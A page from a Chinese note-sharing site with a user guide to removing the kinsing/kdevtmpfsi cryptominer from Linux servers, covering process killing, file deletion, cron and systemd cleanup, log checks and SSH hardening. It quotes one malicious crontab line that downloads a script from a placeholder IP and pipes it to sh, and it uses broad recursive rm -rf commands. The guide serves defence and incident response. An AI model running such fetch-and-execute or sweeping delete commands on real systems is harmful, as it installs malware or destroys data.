墨穗app.notebase.cn
控制台
内容库
动态
管理
账户
U
用户
--
在线
v1.0.165 · 墨穗笔记
笔记

Notebase墨穗
静水流深,落墨成穗。

0笔记
0工具
30推荐

分类导航

按主题直达

编辑精选

站内用户贡献 · 真实笔记

最新收录

每日更新
继续浏览全部内容 →

笔记

0
加载中...

工具

0

此页用于记录用户反馈问题后的每一次改进

关于

笔记用法

“写笔记”支持四种格式——Word 文档、Excel 表格、Markdown、纯文本,起稿或二次编辑时都能随时切换,同一篇笔记想用哪种形态来记,都由你说了算。

md、txt、csv、json 这类纯文本则原样载入,不做多余加工。拿一张现成的表倒进来、改几笔、再导出去,等于白用一台免费的格式转换器。

要带走就在右上角点“下载”,可导出 PDF、Word、Markdown、Excel、TXT 等格式;列表卡片“⋯”菜单里,也有同样的下载入口。

工具用法

在“工具”页点“+ 上传工具”即可发布:填好名称与链接,再用 Markdown 把使用方法写清楚——能解决什么问题、怎么装、怎么用,比堆介绍实在。

要分发安装包就一并上传压缩包(ZIP、RAR、7Z、TAR.GZ,最大 35MB),别人在详情页一键下载;只放链接不带附件也可以。

工具按大家的收藏热度排序,好用的自然会被顶上来。发布后可在详情页或卡片菜单里编辑、下架。

隐藏笔记

写笔记时勾上“隐藏”,这篇就只存在于你自己的账号里:不进列表、不进搜索、不上首页精选,也不会出现在任何公开的页面,链接发给别人同样打不开。

适合放密码、草稿、日记这类只给自己看的内容;想公开,去“发布”打开它,把“隐藏”的勾去掉再保存,之后编辑会默认保持原状态,不会悄悄变回公开。

不想公开、只想临时给人看:点“分享”生成一条带密码和有效期的链接,到期自动失效,你也能随时撤销。

数据安全

你的内容会同时保存在多个副本上,系统定期做备份与完整性校验,再配合异地容灾机制:就算某台机器出问题,数据也不会丢,可以长期放心存放;特别重要的资料,仍建议你另外再留一份备份。

技术

全站跑在容器化、模块化的现代架构上,更新、部署、回滚都很快,扩展性和稳定性都按长期运营的标准来设计(Built for reliability, designed to scale)。

理念

这个网站最早只是一个人的笔记仓库,后来慢慢长成现在的知识中枢。设计上很克制——没有广告、没有追踪、没有推荐算法,只是干干净净地存放一些东西;既然做好了,就公开出来,万一有人用得上呢。

原则

不做大而全,不做平台梦,保持简单、保持克制、保持好奇。所有内容都由用户贡献、由用户维护:不会突然冒出付费墙,不会在角落塞广告位,也不会把你的数据卖给第三方。

更多

产品会持续迭代,站内日志页记录着每一次改动,改了什么都有迹可循;想了解这个站是怎么一步步走到今天的,翻翻日志就能看到来龙去脉。

举报

如果在这里看到涉嫌违规的内容,点对应卡片右侧的“举报”按钮就能提交,我们会尽快核实处理;也谢谢你花一点时间,一起把这里维护干净。

趋势

// 点击导航加载发现
归档
// 归档为空
最近浏览
// 暂无浏览记录
发布
// 加载中...
用户发布
// 加载中...
用户管理
// 加载中...
访问统计
// 加载中...
内容审核
// 加载中...
个人信息
// 加载中...
返回首页

服务器 CPU 100%?kill 掉的挖矿进程一分钟又复活——先认识它的"监工"

2026-09-02网络安全

登录云服务器,top 一看,有个叫 kdevtmpfsi 的进程 CPU 占用快 100%。kill -9 干掉它,不到一分钟又满血复活,CPU 再次拉满。如果你只盯着这个进程杀,永远杀不干净——因为真正的 BOSS 是另一个叫 kinsing 的"监工"进程,它负责看着矿工进程,一死就重启。先杀监工,再杀矿工,顺序错了就是白忙。

第一步:先杀监工 kinsing,再杀矿工 kdevtmpfsi

ps -aux | grep kinsing
kill -9 <kinsing的PID>

ps -aux | grep kdevtmpfsi
kill -9 <kdevtmpfsi的PID>

顺序一定要对:监工死了,矿工被杀后才不会复活。两个都处理完,CPU 应该能掉下来。

第二步:删文件(重点在 /tmp 和 /var/tmp)

挖矿木马特别喜欢藏在临时目录:

rm -rf /tmp/kdevtmpfsi /tmp/kinsing /var/tmp/kinsing

保险起见全局搜一遍:

find / -name kdevtmpfsi -exec rm -rf {} \;
find / -name kinsing -exec rm -rf {} \;

如果删的时候提示 Operation not permitted,说明文件被加了 immutable 属性,先去属性再删:

lsattr /tmp/kdevtmpfsi        # 看有没有 i 属性
chattr -i /tmp/kdevtmpfsi     # 去掉 immutable
rm -rf /tmp/kdevtmpfsi

第三步:清定时任务——它是复活的遥控器

挖矿木马靠 crontab 持久化,最常见的恶意任务是定时去下载执行脚本,比如:

* * * * * wget -q -O - http://某个IP/spr.sh | sh > /dev/null 2>&1
crontab -l          # 看当前用户的定时任务
crontab -e          # 把恶意行删掉
crontab -r          # 不放心就全清

同时检查系统级 cron 目录:/var/spool/cron/ 下每个用户的文件都要看一遍,root 的更要看。

第四步:查后门和入侵痕迹

netstat -anpt        # 看有没有连到可疑 IP 的进程
cat ~/.ssh/authorized_keys    # 看有没有不明公钥(被人加了后门钥匙就等着被反复进)

日志溯源(看谁登录过、什么时候开始的):

tail -n 500 /var/log/secure | grep 'Accepted'        # CentOS/RedHat
grep 'Accepted' /var/log/auth.log                     # Ubuntu/Debian

第五步:防再生——给文件占坑加锁(小技巧)

病毒是通过下载脚本覆写文件来再生的,那就把路径先占住、锁死:

echo 123 > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi

病毒想往这个路径写文件时会失败,这招能挡住一部分靠固定路径复活的样本。

第六步:加固,别清了再中

  • SSH 禁密码登录、改用密钥;别再用弱口令。
  • SSH 换到高位端口,减少被全网扫描命中。
  • 防火墙最小化开放,只放行真需要的端口。
  • Docker 容器里也查一遍:这类木马会顺着漏洞打进容器内部。
  • 最关键的:找到入侵入口。公网裸奔的未授权服务、老版本 Web 中间件漏洞、弱口令,都是入口。不堵住入口,清了还会再中。

判断范围:CPU 高但能确定不是自己业务导致的,先按上面的顺序过一遍;如果反复杀不净、CPU 又起来,八成还有第二个下载源或后门进程没找出来,回头查 crontab 和 authorized_keys 是最容易漏的。

补充一个容易漏的持久化位置:systemd 用户级服务和 profile 注入

  • 除了 crontab,挖矿木马还会往 systemd 塞服务:systemctl list-unit-files | grep -iE 'kinsing|kdev|tmp|sys',看有没有名字可疑的 unit;再看 /etc/systemd/system/ 和 /usr/lib/systemd/system/ 下新增时间可疑的文件。发现就 systemctl disable --now 然后删文件、systemctl daemon-reload。
  • 登录 shell 启动文件也是藏身处:~/.bashrc、~/.profile、/etc/profile.d/*.sh 里可能被追加了 wget|curl ... |sh 这类行。grep -nE 'wget|curl|sh' ~/.bashrc ~/.profile /etc/profile.d/*.sh 扫一遍,看到可疑的拉取命令就删。
  • 杀干净后建议改一遍所有密码和密钥:能进来一次,说明某个凭据已经泄露。SSH 密钥、数据库密码、面板密码全换掉,比光清进程实在。木马常顺手把内网横向渗透的凭据也偷走,别只盯着这一台。

参考出处:
https://cloud.tencent.cn/developer/article/2528720
https://www.cnblogs.com/syjp/p/19593156

相似推荐
用另一台手机远程帮人弄手机:林林远程控制,安卓被控 + 浏览器/小程序主控安卓补装 Google 三件套:服务框架 + Play 商店,附安装器与步骤VPS节点一键部署+本地订阅转换脚本苹果硬刚英国政府:撤销iCloud高级数据保护,一场加密与主权的全球博弈压迫还是诈骗?AdGuard DNS 对 Archive.today 投诉事件的深度调查谷歌 GDPR 合规漏洞:Brave 揭露实时竞价广告系统的隐私数据广播机制
编写使用方法
Markdown 格式 · Ctrl+Enter 确定
0 字新建笔记
欢迎回来
登录你的墨穗笔记账户
忘记密码?
还没有账户?立即注册
创建账户
注册你的专属墨穗笔记
已有账户?去登录
找回密码
输入注册邮箱获取验证码
返回登录
请输入图片中的验证码以继续注册
加载中...
取消
新建收藏
手动添加你喜欢的内容
取消
编辑头像与昵称
上传新头像或修改你的显示昵称
支持 JPG/PNG,最大 2MB
取消

问题反馈

隐私提醒

取消
编辑工具
受控分享
为这篇笔记生成限时 / 带密码的临时链接
关闭